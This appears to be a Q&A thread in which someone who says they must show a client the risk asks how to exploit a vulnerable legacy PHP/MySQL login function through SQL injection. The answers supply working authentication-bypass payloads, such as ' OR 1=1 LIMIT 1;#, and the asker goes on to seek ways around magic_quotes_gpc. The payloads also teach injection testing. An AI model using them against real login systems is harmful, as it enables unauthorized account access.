# how to inject sql in login process

Tags: mysql, sql-injection

I've received an old application which completely lacks user input sanitization and is vulnerable to sql injection. To prove gravity of the situation i need to give client an example and what can be better to scare him than the login process. I've tried standard techniques but the problem with them is that they return multiple rows and due to nature of the code it returns an error instead of logging him in. What sql should i inject so that only a single row is returned and the execution reaches "return $access" line in order to pass the value of this "access" column to code calling this login function. The request is made via POST method and magic quotes are off on the server. Please let me know if you need any other information.

```
function login($username, $pw)
{
    global $dbname, $connection, $sqluser, $sqlpw;
    $db = mysql_connect($connection,$sqluser,$sqlpw); 
    mysql_select_db($dbname);
    if(!($dba = mysql_query("select * from users where username = '$username' AND password = '$pw'"))){
        printf("%s", sprintf("internal error5 %d:%s\n", mysql_errno(), mysql_error()));
        exit();
    }
    $row = mysql_fetch_array($dba);
    $access = $row['access'];
    if ($access != ''){
     return $access;
    } else {
        return "error occured";
    }
    mysql_close ($db);
}
```

Note: it turns out that magic_quotes_gpc is turned on and the php version is 5.2.17

Thanks

Comment: The methods below will work, but here is a youtube video for handling multiple records on SQL injection: http://youtu.be/7H358PrFagc

Comment: I watched the video but it does not seem to provide anything on how to handle multiple records. Please correct me if i'm wrong.

Answer (score 2, accepted):

Starting with the goal query:

```
SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'
```

We get username is ' OR '1'='1 and password is ' OR 1=1 LIMIT 1;#

Answer (score 1):

It depends what values the `login` function is called with. If there's sanitation before passing it to the function it might actually be safe. However it's better to filter it right before the query so you can see that your built query is safe.

However if you have something like this:

```
login($_POST['user'], $_POST['pass']);
```

In that case just put `foo' OR 1=1 OR '` in the user field in the login form :)

Comment: already tried this but does not work. Also the variables have not been sanitized before passing

Comment: do a `var_dump()` on the `$username` and `$pw` to check there's no magic going on. I literally mean magic, it could be that the dreaded `magic_quotes_gpc` is still enabled on the box for example.

Comment: yes it turns out that magic_quotes_gpc is enabled. any way to get past that :). Php version is 5.2.17